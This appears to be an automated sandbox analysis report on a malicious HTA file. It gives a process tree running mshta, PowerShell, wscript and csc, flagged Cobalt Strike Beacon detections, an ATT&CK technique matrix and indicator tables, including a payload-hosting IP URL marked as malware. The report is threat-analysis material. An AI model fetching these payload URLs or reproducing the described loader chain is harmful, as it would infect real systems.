          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-GroupPolicy-ClientTools-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.Management.Infrastructure.Native\v4.0_1.0.0.0__31bf3856ad364e35\Microsoft.Management.Infrastructure.Native.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\AppvClient\Microsoft.AppV.AppVClientPowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.AppV.AppvClientComConsumer\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.AppV.AppvClientComConsumer.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.1865.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-SecureStartup-Subsystem-WOW64-Package~31bf3856ad364e35~amd64~en-GB~10.0.19041.1.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\BitLocker\Microsoft.BitLocker.Structures.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_MSIL\Microsoft.PowerShell.Commands.Management\v4.0_3.0.0.0__31bf3856ad364e35\Microsoft.PowerShell.Commands.Management.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0013~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.KeyDistributionService.Cmdlets\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.KeyDistributionService.Cmdlets.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package03~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Desktop-Required-WOW64-Package0014~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.SecureBoot.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.SecureBoot.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0314~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\Microsoft.WindowsAuthenticationProtocols.Commands\v4.0_10.0.0.0__31bf3856ad364e35\Microsoft.WindowsAuthenticationProtocols.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package0012~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-AppManagement-UEV-WOW64-Package~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\UEV\Microsoft.Uev.Commands.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-WOW64-Package00~31bf3856ad364e35~amd64~~10.0.19041.2006.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\Modules\WindowsErrorReporting\Microsoft.WindowsErrorReporting.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Program Files (x86)\AutoIt3\AutoItX\AutoItX3.PowerShell.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\Microsoft.NET\assembly\GAC_32\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\ VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exeQueries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformationJump to behavior
          Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\csc.exeKey value queried: HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Cryptography MachineGuidJump to behavior
MITRE ATT&CK matrix (the report's tactic columns, listed per tactic; a numeric prefix is the signature-count marker the report attaches to a technique that was observed):

Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS
Resource Development: 111 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services
Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services
Execution: 12 Command and Scripting Interpreter; 1 Exploitation for Client Execution; 4 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers
Persistence: 111 Scripting; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Privilege Escalation: 11 Process Injection; 1 DLL Side-Loading; Logon Script (Windows); Login Hook; Network Logon Script; RC Scripts; Startup Items
Defense Evasion: 1 Masquerading; 21 Virtualization/Sandbox Evasion; 11 Process Injection; 1 Deobfuscate/Decode Files or Information; 1 Obfuscated Files or Information; 1 Software Packing; 1 DLL Side-Loading
Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync
Discovery: 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; 2 File and Directory Discovery; 13 System Information Discovery; Remote System Discovery
Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management
Collection: 1 Email Collection; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture
Command and Control: 1 Encrypted Channel; 1 Ingress Tool Transfer; 2 Non-Application Layer Protocol; 13 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port
Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel
Impact: Abuse Accessibility Features; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery
Behavior Graph ID: 1564308 | Sample: greatthingetniretimewithgoo... | Startdate: 28/11/2024 | Architecture: WINDOWS | Score: 100

Process tree and per-node findings recovered from the behavior graph:

• Start node: DNS/IP: ip.3105.filemail.com; 3105.filemail.com. Signatures: Suricata IDS alerts for network traffic; Malicious sample detected (through community Yara rule); Antivirus detection for URL or domain; 15 other signatures. Starts mshta.exe.
  • mshta.exe: Detected Cobalt Strike Beacon; Suspicious powershell command line found; PowerShell case anomaly found. Starts powershell.exe.
    • powershell.exe: DNS/IP: 23.95.128.215, 49730, 80, AS-COLOCROSSINGUS, United States. Dropped: seethepossiblethin...imetogivemebest.vBs (Unicode); C:\Users\user\AppData\...\w0uathue.cmdline (Unicode). Signatures: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found; Found suspicious powershell code related to unpacking or dynamic code loading. Starts wscript.exe, powershell.exe, csc.exe, conhost.exe.
      • wscript.exe: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Wscript starts Powershell (via cmd or directly); 3 other signatures. Starts powershell.exe.
        • powershell.exe: Detected Cobalt Strike Beacon; Suspicious powershell command line found; Obfuscated command line found. Starts powershell.exe, conhost.exe.
          • powershell.exe: DNS/IP: ip.3105.filemail.com 193.30.119.205, 443, 49731, DFNVereinzurFoerderungeinesDeutschenForschungsnetzese, unknown.
      • powershell.exe: Loading BitLocker PowerShell Module.
      • csc.exe: Dropped: C:\Users\user\AppData\Local\...\w0uathue.dll (PE32). Starts cvtres.exe.

Source | Detection | Scanner | Label | Link
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta | 21% | ReversingLabs | Script-WScript.Trojan.Asthma |
greatthingetniretimewithgoodnewgivenwhichgiventhnseethebest.hta | 29% | Virustotal | | Browse
          No Antivirus matches
          No Antivirus matches
          No Antivirus matches
Source | Detection | Scanner | Label
http://ip.3105.filemail.com | 0% | Avira URL Cloud | safe
http://3105.filemail.com | 0% | Avira URL Cloud | safe
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFlb; | 0% | Avira URL Cloud | safe
https://go.microsoft.cH | 0% | Avira URL Cloud | safe
https://3105.file | 0% | Avira URL Cloud | safe
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIFPb | 0% | Avira URL Cloud | safe
http://23.95.128.215/226/seethep | 0% | Avira URL Cloud | safe
https://go.microsoft.cH | 0% | Virustotal |
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF | 100% | Avira URL Cloud | malware
http://3105.filemail.com | 0% | Virustotal |
Name | IP | Active | Malicious | Antivirus Detection | Reputation
ip.3105.filemail.com | 193.30.119.205 | true | false | | high
3105.filemail.com | unknown | unknown | false | | high
Name | Malicious | Antivirus Detection | Reputation
http://23.95.128.215/226/seethepossiblethingsforentiretimetogivemebest.tIF | true | Avira URL Cloud: malware | unknown
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNdQjbb3mexfwQzKmTXg&skipreg=true&pk_vid=e0109638c9bfb9571732531309b5ff7c | false | | high
Name | Source | Malicious | Antivirus Detection | Reputation
https://3105.filemail.com/api/file/get?filekey=shTPHbCPX8o-lOtCqHLG6_0xCy-xl4tnxlAVbQ95-dviTK5cARaNd | powershell.exe, 00000009.00000002.1820142065.00000000053E8000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://nuget.org/NuGet.exe | powershell.exe, 00000001.00000002.1817137670.0000000005907000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000003.00000002.1701451021.0000000005E08000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000009.00000002.1836439427.00000000062F8000.00000004.00000800.00020000.00000000.sdmp | false | | high
https://aka.ms/winsvr-2022-pshelp | powershell.exe, 00000003.00000002.1699204987.0000000004EF6000.00000004.00000800.00020000.00000000.sdmp | false | | high
http://3105.filemail.com | powershell.exe, 00000009.00000002.1820142065.00000000056EE000.00000004.00000800.00020000.00000000.sdmp | false | 0%, Virustotal; Avira URL Cloud: safe | unknown
